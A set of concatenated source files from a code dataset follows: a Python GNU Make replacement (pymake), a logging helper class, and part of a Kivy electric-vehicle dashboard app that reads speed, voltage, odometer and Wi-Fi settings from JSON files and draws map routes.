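x, y = np.loadtxt('mr.out', delimiter=',', unpack=True)
plt.plot(x, y, label='Euler')
plt.legend()
plt.show()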
/usr/bin/env python\n\"\"\"A GNU Make replacement in python.\n\nA python scripe which import pymake, defines a list of rules and\ncalls \"maker(rules, trgt)\" is now a standalone makefile.\n\nInternally, rules are parsed into a dependency tree of \"requirements\",\nthis is compressed into a hierarchical list of orders, and then the\norders are executed.\n\n\"\"\"\n\n\nimport subprocess\nimport re\nimport os\nimport sys\nimport itertools\nimport optparse\nimport logging\nfrom contextlib import contextmanager\nfrom threading import Thread, Event\nfrom math import isnan\n\n\nLOG = logging.getLogger(__name__)\n\n@contextmanager\ndef backup_existing_while(path, extension=\"~\", prepend=\"\", else_on_fail=None):\n \"\"\"A context manager to backup a file during an action, then remove it.\n\n File at *path*, if it exists, is moved to the backup location\n defined by *prepend* + path + *extension*. When the context manager\n is closed without error, the backup is removed.\n\n If an error occurs while the file is backed up, whatever now exists at\n *path* is replaced by the backup.\n\n If *path* did not exist, whatever now exists at *path* is served as an\n argument to *else_on_fail*.\n\n Takes one position argument:\n *path*\n Takes three keyword arguments:\n *extension* (default: '~')\n *prepend* (default: ''),\n *else_on_fail* (default: None)\n\n \"\"\"\n backup_path = os.path.join(os.path.dirname(path),\n prepend + os.path.basename(path) + extension)\n original_exists = os.path.exists(path)\n if original_exists:\n LOG.debug(\"backing up the extant {path}\".format(path=path))\n os.rename(path, backup_path)\n try:\n yield\n except Exception as err:\n LOG.debug(\"an error occured while {path} was backed up\".\\\n format(path=path))\n new_exists = os.path.exists(path)\n if original_exists:\n LOG.debug((\"since {backup_path} exists, \"\n \"it will replace any new {path}\").\\\n format(path=path, backup_path=backup_path))\n os.rename(backup_path, path)\n elif new_exists and else_on_fail:\n LOG.debug((\"since {backup_path} does not exist, \"\n \"{else_on_fail} will be called on {path}\").\\\n format(backup_path=backup_path,\n else_on_fail=else_on_fail, path=path))\n else_on_fail(path)\n raise err\n else:\n if original_exists:\n LOG.debug((\"no error occurred while {path} was backed up. 
\"\n \"{backup_path} will be removed.\").\\\n format(path=path, backup_path=backup_path))\n os.remove(backup_path)\n\n\nclass Rule():\n \"\"\"A task construction and dependency rule.\n\n A rule is a template for a task, defining:\n\n *trgt* - a target pattern; a regular expression matching targets\n of the rule\n *preqs* - a list of prerequisite templates\n *recipe* - a recipe template\n\n Rules construct Tasks.\n\n \"\"\"\n\n def __init__(self, trgt, preqs=[], recipe=None,\n order_only=False, **env):\n self.env = env\n self.target_template = trgt\n self.prerequisite_templates = [template.strip() for template in preqs]\n self.recipe_template = recipe\n if self.recipe_template == '':\n self.recipe_template = None\n self.order_only = order_only\n\n def __repr__(self):\n return (\"Rule(trgt={self.target_template!r}, \"\n \"preqs={self.prerequisite_templates!r}, \"\n \"recipe={self.recipe_template!r}, \"\n \"**{self.env!r})\").format(self=self)\n\n def __str__(self):\n return self.target_template\n# return (\"{self.target_template} : {self.prerequisite_templates}\\n\"\n# \"{self.recipe_template}\").format(self=self)\n\n def set_env(self, env):\n self.env = env\n\n def update_env(self, env_update):\n self.set_env(dict(list(self.env.items()) + list(env_update.items())))\n\n def get_target(self):\n return self.target_template\n\n def _get_target_pattern(self):\n \"\"\"Return the target pattern.\n\n The target pattern is returned as an exact regex.\n (i.e. with ^ and $ around it.)\n\n \"\"\"\n return \"^\" + self.target_template.format(**self.env) + \"$\"\n\n def _make_target_groups(self, trgt):\n \"\"\"Return regex groups for a target.\n\n \"\"\"\n target_pattern = self._get_target_pattern()\n match = re.match(target_pattern, trgt)\n if match is not None:\n return match.groups()\n else:\n raise ValueError(\"{trgt} does not match {ptrn}\".\n format(trgt=trgt, ptrn=target_pattern))\n\n def applies(self, trgt):\n \"\"\"Return if the query target matches the rule's pattern.\"\"\"\n try:\n self._make_target_groups(trgt)\n except ValueError:\n return False\n else:\n return True\n\n def _make_preqs(self, trgt):\n \"\"\"Return a list of prerequistites for the target.\n\n Construct pre-requisites by matching the rule's target\n pattern to the *trgt* string.\n\n \"\"\"\n groups = self._make_target_groups(trgt)\n prerequisites = [template.format(*groups, trgt=trgt, **self.env)\n for template in self.prerequisite_templates]\n return prerequisites\n\n def _make_recipe(self, trgt):\n \"\"\"Return the recipe for the target.\n\n Construct the recipe by matching the rule's target\n pattern to the *trgt* string.\n\n \"\"\"\n assert self.recipe_template is not None\n groups = self._make_target_groups(trgt)\n preqs = self._make_preqs(trgt)\n all_preqs = \" \".join(preqs)\n return self.recipe_template.format(*groups, trgt=trgt,\n preqs=preqs, all_preqs=all_preqs,\n **self.env)\n\n def make_task(self, trgt):\n \"\"\"Return a task reprisentation of rule applied to *trgt*.\"\"\"\n # The trgt should always match the pattern.\n assert self.applies(trgt)\n if self.recipe_template is None:\n return DummyReq(trgt, self._make_preqs(trgt))\n else:\n return TaskReq(trgt, self._make_preqs(trgt),\n self._make_recipe(trgt), self.order_only)\n\n def make_req(self, trgt):\n self.make_task(self, trgt)\n\n\nclass Requirement():\n \"\"\"Base class for all requirements.\n\n Requirements are items which must be verified or carried out in a\n particular order. 
All requirements have a \"target\" which should be\n a unique identifier for the requirement, usually a file path.\n\n A Rule produces a particular type of requirement called a Task\n which consists of the filled in recipe template.\n\n \"\"\"\n\n def __init__(self, trgt):\n self.target = trgt\n\n def __repr__(self):\n return (\"{self.__class__.__name__}\"\n \"(trgt={self.target!r})\").format(self=self)\n\n def __str__(self):\n return self.target\n\n def __hash__(self):\n return hash(self.target)\n\n def __eq__(self, other):\n return self.target == other.target\n\n def last_update(self):\n \"\"\"Return the time that the target was last updated.\n\n The time returned determines the whether or not other tasks are\n considered up to date, so if you want all tasks which depend on\n the given task to run, this function should return a larger value.\n\n float('nan') should be returned when the time of last update cannot\n be determined.\n\n \"\"\"\n raise NotImplementedError(\"The base Requirement class has not \"\n \"implemented last_update, but it *should* \"\n \"be implemented in all functioning \"\n \"sub-classes\")\n\n\nclass FileReq(Requirement):\n \"\"\"A Requirement with a target that is a file.\"\"\"\n\n def __init__(self, trgt):\n super(FileReq, self).__init__(trgt=trgt)\n\n def last_update(self):\n if os.path.exists(self.target):\n return os.path.getmtime(self.target)\n else:\n return float('nan')\n\n\nclass TaskReq(FileReq):\n \"\"\"A requirement which defines how to make the target file.\"\"\"\n\n def __init__(self, trgt, preqs, recipe, order_only=False):\n super(TaskReq, self).__init__(trgt=trgt)\n self.prerequisites = preqs\n self.recipe = recipe\n self.order_only = order_only\n\n def __repr__(self):\n return (\"{self.__class__.__name__}(trgt={self.target!r}, \"\n \"preqs={self.prerequisites!r}, \"\n \"recipe={self.recipe!r})\").format(self=self)\n\n def __str__(self):\n return self.target\n\n def __hash__(self):\n return hash(self.recipe)\n\n def __eq__(self, other):\n # But for TaskReq objects, the recipe itself determines identity.\n return self.recipe == other.recipe\n\n def last_update(self):\n if self.order_only and os.path.exists(self.target):\n # If it exists, those for which it is a pre-requisite\n # (either directly or indirectly) should not be considered\n # out of date, regardless of updates to this file.\n return 0.0\n else:\n return super(TaskReq, self).last_update()\n\n def run(self, verbose=1, execute=True, exc_event=None, **kwargs):\n \"\"\"Run the task to create the target.\"\"\"\n LOG.debug(\"running task for '{self.target}'\".format(self=self))\n msg = \"{self.recipe}\".format(self=self).rstrip('\\n')\n for line in msg.split('\\n'):\n LOG.info(\"| in| \" + line)\n if execute:\n with backup_existing_while(self.target, prepend='.',\n extension='~pymake_backup',\n else_on_fail=os.remove):\n logging.debug(\"executing recipe for '{self.target}'\".\\\n format(self=self))\n proc = subprocess.Popen(self.recipe, shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n bufsize=4096)\n for line in proc.stdout:\n line = line.decode()\n LOG.info(\"|out| \" + line.rstrip('\\n'))\n if proc.wait() != 0:\n raise subprocess.CalledProcessError(proc.returncode,\n self.recipe)\n\n\nclass DummyReq(Requirement):\n \"\"\"A requirement which only points to other requirements.\"\"\"\n\n def __init__(self, trgt, preqs):\n super(DummyReq, self).__init__(trgt=trgt)\n self.prerequisites = preqs\n\n def last_update(self):\n return float('nan')\n\n def run(self, verbose=1, 
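# TaskReq.run above streams a shell recipe line by line; the core pattern
# in isolation: merge stderr into stdout, iterate the pipe, then check the
# exit status.
import subprocess

def stream_shell(cmd):
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT, bufsize=4096)
    for line in proc.stdout:
        print('|out| ' + line.decode().rstrip('\n'))
    if proc.wait() != 0:
        raise subprocess.CalledProcessError(proc.returncode, cmd)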
**kwargs):\n msg = (\"DummyReq '{self.target}' running, which usually \"\n \"indicates that all sub-tasks are completed.\").\\\n format(self=self)\n LOG.info(msg)\n\n\ndef build_dep_graph(trgt, rules):\n \"\"\"Return the root and a dependency graph.\n\n A dependency graph is a direction network linking tasks to their\n pre-requisites.\n\n This function encodes the graph as a recursive dictionary of Requirement\n objects. Each requirement points to it's pre-requisites, which\n themselves point to their own pre-requisites, etc.\n\n The returned graph is guarenteed to be acyclic.\n\n Operates recursively.\n\n \"\"\"\n LOG.debug(\"entered build_dep_graph for '{trgt}'\".format(trgt=trgt))\n rules = list(rules)\n trgt_rule = None\n for i, rule in enumerate(rules):\n if rule.applies(trgt):\n trgt_rule = rules.pop(i)\n LOG.debug(\"'{trgt_rule!s}' applies to '{trgt}'\".\\\n format(trgt_rule=trgt_rule, trgt=trgt))\n break\n if trgt_rule is None:\n LOG.debug(\"no rule found which applies to '{trgt}'\".format(trgt=trgt))\n if os.path.exists(trgt):\n LOG.debug(\"'{trgt}' exists\".format(trgt=trgt))\n requirement = FileReq(trgt)\n return requirement, {requirement: set()}\n else:\n raise ValueError((\"No rule defined for {trgt!r}, the required \"\n \"file doesn't exist, or there is a \"\n \"cycle in the dependency graph.\")\n .format(trgt=trgt))\n trgt_task = trgt_rule.make_task(trgt)\n preq_trgts = trgt_task.prerequisites\n preq_tasks = set()\n trgt_graph = {}\n for preq_trgt in preq_trgts:\n preq_task, preq_graph = build_dep_graph(preq_trgt, rules)\n preq_tasks.add(preq_task)\n trgt_graph = dict(list(trgt_graph.items()) + list(preq_graph.items()))\n trgt_graph[trgt_task] = preq_tasks\n return trgt_task, trgt_graph\n\n\ndef merge_orders(*iters):\n \"\"\"Yield merged sets from *iters*.\n\n Takes any number of iterators of sets and merges sets from the front.\n Where any given entry in a set only occurs once.\n\n This function is meant to deal with the semi-ordered (i.e. priority\n ordered, but with ties) lists of requirements which must be merged\n together.\n\n \"\"\"\n returned_set = set()\n for priority_orders in itertools.zip_longest(*iters, fillvalue=set()):\n priority_set = set.union(*priority_orders)\n priority_set -= returned_set\n returned_set |= priority_set\n if priority_set != set():\n yield priority_set\n\n\ndef build_orders(req, graph):\n \"\"\"Return a list of requirements in priority order.\n\n Given a dependency graph and a root requirement, returns a list\n of sets. 
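# merge_orders above in action: priority sets are merged front-to-back and
# each requirement is kept only at its highest priority (assuming the
# function above is in scope).
assert list(merge_orders([{1}, {2}], [{2}, {3}])) == [{1, 2}, {3}]
assert list(merge_orders([{1}], [{1}, {2}])) == [{1}, {2}]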
The requirements in every set only depend on requirements\n further down the orders list.\n\n Operates recursively.\n\n \"\"\"\n last_req_update = req.last_update()\n if (req not in graph) or (len(graph[req]) == 0):\n LOG.debug(\"'{req!s}' is a leaf requirement\".format(req=req))\n if not hasattr(req, 'run'):\n LOG.debug(\"'{req!s}' is not runnable\".format(req=req))\n return [set()], last_req_update\n elif not isnan(last_req_update): # The target already exists:\n LOG.debug(\"'{req!s}' last updated at {last_update}\".\\\n format(req=req, last_update=last_req_update))\n return [set()], last_req_update\n else: # The target does not exist and the task is runnable:\n LOG.debug((\"'{req!s}' does not exist; the task to create \"\n \"it has been added to the build orders\").\\\n format(req=req))\n return [{req}], last_req_update\n preq_update_times = []\n preq_orders_lists = []\n for preq in graph[req]:\n orders_list, update_time = build_orders(preq, graph)\n preq_orders_lists.append(orders_list)\n preq_update_times.append(update_time)\n last_graph_update = max(preq_update_times)\n LOG.debug((\"the most recent update of a pre-requisite for \"\n \"'{req!s}' was at {last_update}\").\\\n format(req=req, last_update=last_graph_update))\n preq_orders_list = list(merge_orders(*preq_orders_lists))\n # Remember that last_graph_update is *nan* if _any_ prereq is nan.\n # last_req_update is nan if the target file does not currently exist.\n # Therefore, a set of orders will be returned when either of these\n # possibilities occurs (plus the canonical case, when any precursor\n # was updated more recently than the focal requirement.)\n if last_graph_update < last_req_update:\n LOG.debug(\"'{req!s}' is up-to-date\".format(req=req))\n return [set()], last_req_update\n else:\n LOG.debug(\"'{req!s}' is not up-to-date and will be updated.\".\\\n format(req=req))\n return [{req}] + preq_orders_list, last_graph_update\n\n\ndef run_orders(orders, parallel=False, **kwargs):\n \"\"\"Execute each requirement in a dependency list in order.\n\n If *parallel* == True, a requirement set is run in parallel.\n\n \"\"\"\n kwargs['exc_event'] = exc_event = Event()\n for order_set in reversed(orders):\n if parallel:\n threads = [Thread(target=task.run, kwargs=kwargs)\n for task in order_set]\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n else:\n for task in order_set:\n task.run(**kwargs)\n if exc_event.is_set():\n raise Exception(\"At least one order failed in this set. 
No more \"\n \"orders will be excecuted.\")\n\n\ndef make(trgt, rules, env={}, **kwargs):\n \"\"\"Construct the dependency graph and run it.\"\"\"\n for rule in rules:\n rule.update_env(env)\n root, graph = build_dep_graph(trgt, rules)\n orders, newest_order_update = build_orders(root, graph)\n run_orders(orders, **kwargs)\n\n\ndef visualize_graph(trgt, rules, outpath):\n \"\"\"Draw a figure representing the dependency graph.\n\n By default writes the graph to a file named the same as the calling\n script.\n\n \"\"\"\n import pydot\n root, graph = build_dep_graph(trgt, rules)\n orders, newester_order_update = build_orders(root, graph)\n dot = pydot.Dot(graph_name=\"Dependency\", graph_type='digraph',\n labelloc='r', rankdir=\"BT\")\n dot.set_node_defaults(shape='ellipse', fontsize=24)\n for req in graph:\n for preq in graph[req]:\n dot.add_edge(pydot.Edge(preq.target, req.target))\n for rank, rank_reqs in enumerate(reversed(orders), 1):\n rank_plate = pydot.Cluster(graph_name=str(rank),\n label=\"Order set {r}\".format(r=rank))\n for req in rank_reqs:\n rank_plate.add_node(pydot.Node(req.target))\n dot.add_subgraph(rank_plate)\n return dot.write_png(outpath)\n\n\ndef maker(rules):\n\n # Name the logger after the calling module\n import __main__\n global LOG\n LOG = logging.getLogger(__main__.__file__)\n\n usage = \"usage: %prog [options] [TARGET]\"\n parser = optparse.OptionParser(usage=usage)\n parser.add_option(\"-q\", \"--quiet\", action=\"store_const\",\n const=0, dest=\"verbose\",\n help=(\"don't print recipes. \"\n \"DEFAULT: print recipes\"))\n parser.add_option(\"-v\", \"--verbose\", action=\"count\",\n dest=\"verbose\", default=1,\n help=(\"print recipes. \"\n \"Increment the logging level by 1. \"\n \"DEFAULT: verbosity level 1 ('INFO')\"))\n parser.add_option(\"-n\", \"--dry\", action=\"store_false\",\n dest=\"execute\", default=True,\n help=(\"Dry run. Don't execute the recipes. \"\n \"DEFAULT: execute recipes\"))\n parser.add_option(\"--figure\", dest=\"fig_outpath\",\n help=(\"Visualize the graph.\"))\n parser.add_option(\"-p\", \"--parallel\", action=\"store_true\",\n dest=\"parallel\", default=True,\n help=(\"execute the recipes in parallel processes. \"\n \"DEFAULT: parallel\"))\n parser.add_option(\"-s\", \"--series\", \"--not-parallel\",\n action=\"store_false\", dest=\"parallel\", default=True,\n help=(\"execute the recipes in series. \"\n \"DEFAULT: parallel\"))\n parser.add_option(\"-V\", \"--var\", \"--additional-var\", dest=\"env_items\",\n default=[], action=\"append\",\n nargs=2, metavar=\"[KEY] [VALUE]\",\n help=(\"add the desired variable to the environment. \"\n \"Additional variables can be passed with \"\n \"more '-V' flags. Variables passed in this \"\n \"fasion override variables defined in any other \"\n \"way\"))\n parser.add_option(\"-d\", \"--debug\", dest=\"debug\",\n default=False, action=\"store_true\",\n help=(\"display full debug messages with headers. \"\n \"DEFAULT: False\"))\n opts, args = parser.parse_args()\n\n if opts.debug:\n logging.basicConfig(level=logging.DEBUG, format=(\"(%(thread)s):\"\n \"%(name)s:\"\n \"%(levelname)s:\"\n \"%(asctime)s\\t\"\n \"%(message)s\"))\n else:\n logging.basicConfig(level=[logging.ERROR,\n logging.INFO,\n logging.DEBUG][opts.verbose],\n format=\"%(message)s\")\n\n\n if len(args) == 1:\n target = args[0]\n elif len(args) == 0:\n # If no target specified, use the first target. 
This will not take\n        # into account environmental variables passed with the '-V' flag.\n        target = rules[0].get_target()\n    else:\n        raise ValueError(\"Wrong number of positional arguments passed to pymake.\")\n    if opts.fig_outpath:\n        visualize_graph(target, rules, opts.fig_outpath)\n    make(target, rules, env=dict(opts.env_items), verbose=opts.verbose,\n         execute=opts.execute, parallel=opts.parallel)\n","repo_name":"bsmith89/pymake-old","sub_path":"lib/pymake.py","file_name":"pymake.py","file_ext":"py","file_size_in_byte":21501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4484790909","text":"# -*- coding:utf-8 -*-\n# @Time :2019/11/8 0008 13:03\n# @Author :wulin\n# @Mail :286075568@qq.com\n# @FileName: logging.py\n# @Software: PyCharm\n\nimport logging, time\n\n\n# Log collector\n\nclass MyLog:\n    def __init__(self, log_name):\n        self.log_name = log_name  # name of this log collector\n\n    def my_log(self, msg, level):\n        logger = logging.getLogger(self.log_name)\n        logger.setLevel('DEBUG')  # capture records at DEBUG level and above\n        # Formatter: decides the layout of the log output\n        formatter = logging.Formatter('%(asctime)s-%(levelname)s-%(filename)s-%(name)s-log message:%(message)s')\n        # 2. Log handlers: the console and a designated file\n        ch = logging.StreamHandler()  # this handler writes to the console\n        ch.setLevel('DEBUG')  # only emit records at DEBUG level and above\n        ch.setFormatter(formatter)\n\n        now = time.strftime('%Y-%m-%d')  # get today's date\n        path = \"./test_result/log_txt/ydh_api_\" + now + \".txt\"  # build the file path\n        # where the log file is ultimately stored\n        fh = logging.FileHandler(path, encoding='UTF-8')\n        fh.setLevel('DEBUG')\n        fh.setFormatter(formatter)\n        # 3. Attach the handlers to the logger\n        logger.addHandler(ch)\n        logger.addHandler(fh)\n\n        if level == 'DEBUG':\n            logger.debug(msg)\n        elif level == 'INFO':\n            logger.info(msg)\n        elif level == 'WARNING':\n            logger.warning(msg)\n        elif level == 'ERROR':\n            logger.error(msg)\n        elif level == 'CRITICAL':\n            logger.critical(msg)\n\n        logger.removeHandler(ch)\n        logger.removeHandler(fh)\n\n    def debug(self, msg):\n        self.my_log(msg, 'DEBUG')\n\n    def info(self, msg):\n        self.my_log(msg, 'INFO')\n\n    def warning(self, msg):\n        self.my_log(msg, 'WARNING')\n\n    def error(self, msg):\n        self.my_log(msg, 'ERROR')\n\n    def critical(self, msg):\n        self.my_log(msg, 'CRITICAL')\n","repo_name":"wl55387370/ydh_inter3.0","sub_path":"common/outlog.py","file_name":"outlog.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"462323553","text":"from kivymd.app import MDApp\nfrom kivy.core.window import Window\nfrom kivymd.uix.dialog import MDDialog\nfrom kivy.uix.screenmanager import RiseInTransition, FadeTransition, ScreenManager, Screen\nfrom time import strftime\nfrom math import *\nfrom subprocess import Popen, PIPE, STDOUT\nfrom kivy.clock import Clock\nfrom kivy.graphics import Color, Line, SmoothLine\nfrom kivy.graphics.context_instructions import Translate, Scale\nfrom kivy_garden.speedmeter import SpeedMeter\nfrom kivy_garden.qrcode import QRCodeWidget\nfrom kivy_garden.mapview.utils import clamp\nfrom kivy_garden.mapview import MapView, MapMarker, MapLayer\nfrom kivy_garden.mapview.constants import (\n    CACHE_DIR,\n    MAX_LATITUDE,\n    MAX_LONGITUDE,\n    MIN_LATITUDE,\n    MIN_LONGITUDE,\n)\nfrom kivymd_extensions.akivymd import *\nimport os\nimport requests\nimport joblib\nimport json\n\n#Clock.max_iteration = 50\n# from kivy.config import Config\n# Config.set('graphics', 'width', '800')\n# Config.set('graphics', 'height', '480')\n# Config.write()\n\nWindow.borderless = True\n#Window.size=(800,480)\n#Window.fullscreen = 
True\nWindow.maximize()\n\nclass Dashboard(MDApp):\n sw_started= False\n sw_seconds = 0\n val = \"\"\n tuj = \"\"\n icon = 'logo.svg'\n #global screen_manager\n screen_manager = ScreenManager()\n jarak_tempuh_total = 0\n def build(self):\n self.theme_cls.theme_style = \"Dark\"\n self.theme_cls.primary_palette = \"BlueGray\"\n self.theme_cls.primary_hue = \"500\" \n self.title=\"EVOLION\"\n\n \n return MyLayout()\n\n def on_start(self):\n\n self.root.ids.screen_manager.switch_to(self.root.ids.splashScreen)\n self.subScreen = Clock.schedule_once(self.changeScreen,9)\n \n self.root.ids.power_switch.active=True\n self.jarak_sebelumnya = 0\n signal = False\n\n SOC = 2\n self.SOC = SOC\n self.root.ids.SOC_bar.value = SOC\n SOC_text = str(SOC)+\" V\"\n # SOC_text = \"TEGANGAN : \"+str(SOC)+\" V\"\n self.root.ids.tegangan_value_text.text = SOC_text\n SOC_value = round((SOC/3)*100, 0)\n SOC_value = str(SOC_value)+\"%\"\n\n self.sub1 = Clock.schedule_interval(self.update_status, 5) #(program, interval/waktu dijalankan)\n self.sub2 = Clock.schedule_interval(self.update_data, 1)\n self.sub3 = Clock.schedule_interval(self.odometer, 1)\n self.sub4 = Clock.schedule_interval(self.odometer_submit, 5)\n self.sub5 = Clock.schedule_interval(self.turn_signal, 2)\n self.asyncRun = Clock.schedule_once(self.asyncProgram, 10)\n\n\n def asyncProgram(self,dt):\n Popen(\"python data_communication.py\", shell=True);\n # Popen(\"python rfcomm_server.py\", shell=True);\n\n def changeScreen(self,dt):\n self.root.ids.screen_manager.transition = RiseInTransition()\n self.root.ids.screen_manager.switch_to(self.root.ids.mainScreen)\n\n #update data SOC dan kecepatan\n def update_data(self,nap):\n # tegangan = 0.00\n strtegangan = \"0.0\"\n if self.sw_started:\n self.sw_seconds += nap\n\n try:\n dt = open('database/tegangan.json')\n data_tegangan = json.load(dt)\n strtegangan = data_tegangan['tegangan']\n except:\n strtegangan = \"0.00\"\n\n SOC_text = strtegangan +\" V\"\n # SOC_text = \"TEGANGAN : \"+ strtegangan +\" V\"\n self.root.ids.tegangan_value_text.text = SOC_text\n valtegangan = float(strtegangan)\n if valtegangan >= 71:\n SOC_value = round(80+((valtegangan-71)/0.7),1)\n elif valtegangan <= 60:\n SOC_value = round(0,1)\n # SOC_value = round(30-((60-valtegangan)/2),1)\n else:\n SOC_value = round(80-((70-valtegangan)/0.1125),1)\n # if valtegangan >= 7:\n # SOC_value = round(20+((valtegangan-7)/2.5),1)\n # elif valtegangan <= 6:\n # SOC_value = round(10-((6-valtegangan)/0.6),1)\n # else:\n # SOC_value = round(20-((7-valtegangan)/0.1),1)\n\n # SOC_value = round((float(strtegangan)/3)*100, 1)\n # self.root.ids.SOC_bar.current_percent = 20\n self.root.ids.SOC_bar.current_percent = SOC_value\n self.SOC_value = str(SOC_value)+\"%\"\n\n #kecepatan\n try: \n dk = open('database/kecepatan.json')\n data_kecepatan = json.load(dk)\n self.kecepatan = data_kecepatan['kecepatan']\n except:\n self.kecepatan = \"0.00\"\n\n kecepatan = (float(self.kecepatan)/6)*188.4*0.036\n kecepatan = (format(float(kecepatan), \".0f\"))\n\n #maksimal kecepatan\n if int(kecepatan) >= 121:\n kecepatan = 120\n\n # print(kecepatan)\n self.root.ids.speed_bar.value = kecepatan\n speeds = str(kecepatan)\n self.root.ids.speed_bar_value.text = speeds\n speed_value = \"%s km/h\" %(speeds)\n # self.root.ids.speed_value.text = speed_value\n\n # self.root.ids.progress_relative.current_percent = 20\n\n\n def odometer(self,nap):\n # tegangan = 0.00\n #odo = \"0.0\"\n if self.sw_started:\n self.sw_seconds += nap \n jarak_tempuh = 
(float(self.kecepatan)/6)*188.4*0.00001\n self.jarak_tempuh_total_lima = jarak_tempuh + self.jarak_sebelumnya\n self.jarak_sebelumnya = jarak_tempuh\n\n def odometer_submit(self,nap):\n # tegangan = 0.00\n #odo = \"0.0\"\n if self.sw_started:\n self.sw_seconds += nap\n\n try:\n opdata = open('database/odometer.json')\n data = json.load(opdata)\n odo = data['total_km']\n except Exception as e:\n print('odo error :',str(e) )\n \n \n self.jarak_tempuh_total = float(odo)\n #jarak_tempuh = format(float(jarak_tempuh), \".0f\")\n self.jarak_tempuh_total = self.jarak_tempuh_total + self.jarak_tempuh_total_lima\n # self.jarak_tempuh_total = self.jarak_tempuh_total + jarak_tempuh\n \n self.total_odo = format(float(self.jarak_tempuh_total), \".3f\")\n self.root.ids.odometer.text = format(float(self.total_odo), \".3f\")\n # except:\n odometer = {\n \"total_km\": self.total_odo\n }\n # except:\n # pass\n \n try:\n if len(str(data)) != 0:\n file = \"database/odometer.json\"\n with open(file, 'w') as file_object: \n json.dump(odometer, file_object, indent=4)\n # print(data_json)\n else:\n print(\"Time out! Exit.\\n\")\n pass\n except:\n pass\n # pass\n # odo = \"0.123\"\n \n # try:\n \n def turn_signal(self, nap):\n if self.sw_started:\n self.sw_seconds += nap\n\n fv = open(\"database/vehicle_info.json\")\n vehicleStatus = json.load(fv)\n isTurnLeft = vehicleStatus[\"turn_signal\"][0]\n isTurnRight = vehicleStatus[\"turn_signal\"][1]\n\n if isTurnLeft == True:\n self.root.ids.turn_left.text_color = 255/255,255/255,255/255,1\n Clock.schedule_once(self.blink_signal, 1)\n elif isTurnRight == True:\n self.root.ids.turn_right.text_color = 255/255,255/255,255/255,1\n Clock.schedule_once(self.blink_signal, 1)\n else:\n self.root.ids.turn_left.text_color = 15/255,18/255,23/255,1\n\n def blink_signal(self, *args):\n self.root.ids.turn_left.text_color = 15/255,18/255,23/255,1\n self.root.ids.turn_right.text_color = 15/255,18/255,23/255,1\n\n \n\n def update_status(self, nap):\n if self.sw_started:\n self.sw_seconds += nap\n #tambah detik = :%S\n #self.root.ids.SOC_value.text = \"blok\"\n self.root.ids.time.text = strftime('[b]%H:%M |[/b]')\n\n if (self.root.ids.power_switch.active == False):\n os.system(\"killall python\")\n\n\n fd = open('database/connection.json')\n connectionFile = json.load(fd)\n wifiID = connectionFile['wifi']['id']\n password = connectionFile['wifi']['pass']\n restartConnect = connectionFile['restart'] \n #print (tujuan)\n\n if len(wifiID) == 0:\n self.root.ids.bluetooth_status.text_color = 15/255,18/255,23/255,1\n else:\n if len(password) == 0:\n pass\n else:\n #code disini\n self.root.ids.bluetooth_status.text_color = 255/255,255/255,255/255,1\n if self.val != wifiID:\n try:\n self.root.connect(wifiID, password)\n self.val = wifiID\n #test = sub.out\n except:\n print(\"gagal untuk menyambungkan\")\n pass\n elif restartConnect == True:\n Clock.schedule_once(self.root.connect(wifiID, password), 1)\n\n else:\n pass\n \n fe = open('database/estimation.json')\n estimationFile = json.load(fe)\n tujuanLat = estimationFile['address']['tujuan']['latitude']\n tujuanLng = estimationFile['address']['tujuan']['longitude']\n\n\n if len(tujuanLat) == 0:\n pass\n else:\n if self.tuj != tujuanLat:\n try:\n #fungsi tujuan\n try:\n self.root.ids.mapview.remove_widget(self.root.marker)\n except:\n pass\n\n try:\n self.root.estimasi(tujuanLat,tujuanLng, self.SOC_value)\n except Exception as e:\n print('estimation error :',str(e) )\n \n self.root.center_maps()\n 
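# The route layer has been drawn and centered; the calls below switch\n                    # the mini and main widget stacks to their map screens and relabel\n                    # the info cards (\"JARAK\" = distance, \"WAKTU\" = time,\n                    # \"REKOMENDASI\" = recommendation).\n                    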
self.root.ids.screendget_mini.switch_to(self.root.ids.s_mini2)\n self.root.ids.screendget.switch_to(self.root.ids.test2)\n self.root.ids.menubar_left.switch_to(self.root.ids.menubar_leftTop2)\n self.root.ids.mode_label.text = \"JARAK\"\n self.root.ids.suhu_label.text = \"WAKTU\"\n self.root.ids.card_label.text = \"REKOMENDASI\"\n self.tuj = tujuanLat\n print(\"selesai\")\n except Exception as e:\n print('function error :',str(e) )\n else:\n pass\n \n\n\nclass MyLayout(Screen):\n\n def __init__(self, *args, **kwargs):\n super(MyLayout,self).__init__(*args,**kwargs)\n\n this_path = str(os.getcwd())\n path = this_path+\"/.key/api-key.txt\"\n API_file = open(path,\"r\")\n print(API_file)\n self.API_key = API_file.read()\n API_file.close()\n\n def move_menubar_left2(self):\n \n self.ids.menubar_left.switch_to(self.ids.menubar_leftTop2)\n\n def move_menubar_left1(self):\n self.ids.menubar_left.switch_to(self.ids.menubar_leftTop1)\n \n def move_maps(self):\n #self.ids.screendget.remove_widget(self.ids.test1)\n \n self.ids.screendget.switch_to(self.ids.test2)\n \n def center_maps(self):\n try:\n mapview = self.ids.mapview\n line = LineMapLayer(self.lat, self.lng, self.OriginLat, self.OriginLng)\n mapview.add_layer(line, mode='scatter')\n mapview.center_on(self.OriginLat, self.OriginLng)\n #marker1 = MapMarkerPopup(lat=lat, lon=lng) \n\n except Exception as e:\n print(\"error center map:\", str(e))\n\n try:\n self.marker_origin = MapMarker(lat=self.OriginLat, lon=self.OriginLng, source=\"marker-3-24.png\")\n self.marker_destination = MapMarker(lat=self.lat, lon=self.lng, source=\"marker-red.png\")\n mapview.add_widget(self.marker_origin)\n mapview.add_widget(self.marker_destination)\n Clock.schedule_once(self.zoom_maps, 12)\n #mapview.add_marker(lat=lat, lon=lng)\n except Exception as e:\n print(\"error marker map:\", str(e))\n \n def zoom_maps(self, *args):\n mapview = self.ids.mapview\n mapview.zoom = 15\n \n def move_speed(self):\n self.ids.screendget.switch_to(self.ids.test1)\n\n # def move_graph(self):\n # self.ids.screendget.switch_to(self.ids.test3, direction='left')\n \n def connect(self, name, password):\n try:\n self.commandl = \"nmcli dev wifi connect \"+name+\" password \"+password\n # print (\"success connection : \",sub.out)\n # print (self.command1)\n 